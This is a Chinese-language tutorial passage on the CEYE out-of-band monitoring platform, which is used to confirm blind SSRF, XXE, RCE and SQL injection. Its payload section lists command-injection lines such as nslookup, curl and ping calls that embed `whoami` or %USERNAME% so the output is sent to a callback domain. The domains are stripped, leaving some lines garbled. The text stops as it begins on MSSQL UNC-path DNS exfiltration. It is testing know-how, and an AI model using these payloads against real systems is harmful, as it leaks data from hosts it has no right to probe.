2023年6月25日发(作者：)

CEYE平台的使⽤

0x01 CEYE 是什么

CEYE是⼀个⽤来检测带外（Out-of-Band）流量的监控平台，如DNS查询和HTTP请求。它可以帮助安全研究⼈员在测试漏洞时收集信息（例如SSRF / XXE / RFI / RCE）。

0x02 CEYE的使⽤场景

漏洞检测或漏洞利⽤需要进⼀步的⽤户或系统交互。⼀些漏洞类型没有直接表明攻击是成功的。如Payload触发了却不在前端页⾯显⽰。这时候使⽤CEYE平台，通过使⽤诸如DNS和HTTP之类的带外信道，便可以得到回显信息。

0x03 CEYE如何使⽤

通过DNS带外信道检测 Blind Payload 的执⾏情况

DNS查询可以以多种不同的⽅式进⾏解析。平台提供了⼀台DNS Server来解析域名。它的 nameserver address 被设置为⾃⼰的服务器IP，因此所有关于 的域名的DNS查询最终都会被发送到CEYE的DNS服务器。

例如，在终端中使⽤ nslookup➜ nslookup `whoami`.er: 127.1.1.1Address: 127.1.1.1#53Non-authoritative answer:Name: ess: 118.192.48.48可以看到有记录产⽣，我们保存了最近的100条记录，你可以通过搜索框，搜索并导出你需要的结果，导出格式为 JSON 。

平台拥有⾃⼰的HTTP服务器，记录⽤户域名的所有请求。这可以⽤来做⼀些有趣的事情。例如：➜ curl -X POST /`whoami`?p=http -d data=http{"meta": {"code": 201, "message": "HTTP Record Insert Success"}}在后台，平台将记录客户端请求的URL，远程IP地址，Http Method，Data，User Agent，Content Type等信息。你可以在HTTP Records页⾯找到这些详细信息。

0x04 Payloads：

0x00 Command Executioni. *nix:curl /`whoami`

ping `whoami`.

ii. windowsping %USERNAME%.这⾥给⼤家⼀个win的常⽤变量吧//变量 类型 描述//%ALLUSERSPROFILE% 本地 返回“所有⽤户”配置⽂件的位置。//%APPDATA% 本地 返回默认情况下应⽤程序存储数据的位置。//%CD% 本地 返回当前⽬录字符串。//%CMDCMDLINE% 本地 返回⽤来启动当前的 的准确命令⾏。//%CMDEXTVERSION% 系统 返回当前的“命令处理程序扩展”的版本号。//%COMPUTERNAME% 系统 返回计算机的名称。//%COMSPEC% 系统 返回命令⾏解释器可执⾏程序的准确路径。//%DATE% 系统 返回当前⽇期。使⽤与 date /t 命令相同的格式。由 ⽣成。有关 date 命令的详细信息，请参阅 Date。//%ERRORLEVEL% 系统 返回上⼀条命令的错误代码。通常⽤⾮零值表⽰错误。//%HOMEDRIVE% 系统 返回连接到⽤户主⽬录的本地⼯作站驱动器号。基于主⽬录值⽽设置。⽤户主⽬录是在“本地⽤户和组”中指定的。//%HOMEPATH% 系统 返回⽤户主⽬录的完整路径。基于主⽬录值⽽设置。⽤户主⽬录是在“本地⽤户和组”中指定的。//%HOMESHARE% 系统 返回⽤户的共享主⽬录的⽹络路径。基于主⽬录值⽽设置。⽤户主⽬录是在“本地⽤户和组”中指定的。//%LOGONSERVER% 本地 返回验证当前登录会话的域控制器的名称。//%NUMBER_OF_PROCESSORS% 系统 指定安装在计算机上的处理器的数⽬。//%OS% 系统 返回操作系统名称。Windows 2000 显⽰其操作系统为 Windows_NT。//%PATH% 系统 指定可执⾏⽂件的搜索路径。//%PATHEXT% 系统 返回操作系统认为可执⾏的⽂件扩展名的列表。//%PROCESSOR_ARCHITECTURE% 系统 返回处理器的芯⽚体系结构。值：x86 或 IA64（基于 Itanium）。//%PROCESSOR_IDENTFIER% 系统 返回处理器说明。//%PROCESSOR_LEVEL% 系统 返回计算机上安装的处理器的型号。//%PROCESSOR_REVISION% 系统 返回处理器的版本号。//%PROMPT% 本地 返回当前解释程序的命令提⽰符设置。由 ⽣成。//%RANDOM% 系统 返回 0 到 32767 之间的任意⼗进制数字。由 ⽣成。//%SYSTEMDRIVE% 系统 返回包含 Windows server operating system 根⽬录（即系统根⽬录）的驱动器。//%SYSTEMROOT% 系统 返回 Windows server operating system 根⽬录的位置。//%TEMP%和%TMP% 系统和⽤户 返回对当前登录⽤户可⽤的应⽤程序所使⽤的默认临时⽬录。有些应⽤程序需要 TEMP，⽽其他应⽤程序则需要 TMP。//%TIME% 系统 返回当前时间。使⽤与 time /t 命令相同的格式。由 ⽣成。有关 time 命令的详细信息，请参阅 Time。//%USERDOMAIN% 本地 返回包含⽤户帐户的域的名称。//%USERNAME% 本地 返回当前登录的⽤户的名称。//%USERPROFILE% 本地 返回当前⽤户的配置⽂件的位置。//%WINDIR% 系统 返回操作系统⽬录的位置。

0x01 SQL Injection

i. Microsoft SQL Server

扩展存储程序是⼀个直接运⾏在微软的地址空间库SQL服务器（MSSQL）的动态链接。有⼏个未被公开说明的扩展存储程序对于实现本⽂的⽬的特别有⽤的。攻击者可以使⽤Microsoft Windows通⽤命名约定（UNC）的⽂件和⽬录路径格式利⽤任何以下扩展存储程序引发DNS地址解析。Windows系统的UNC语法具有通⽤的形式：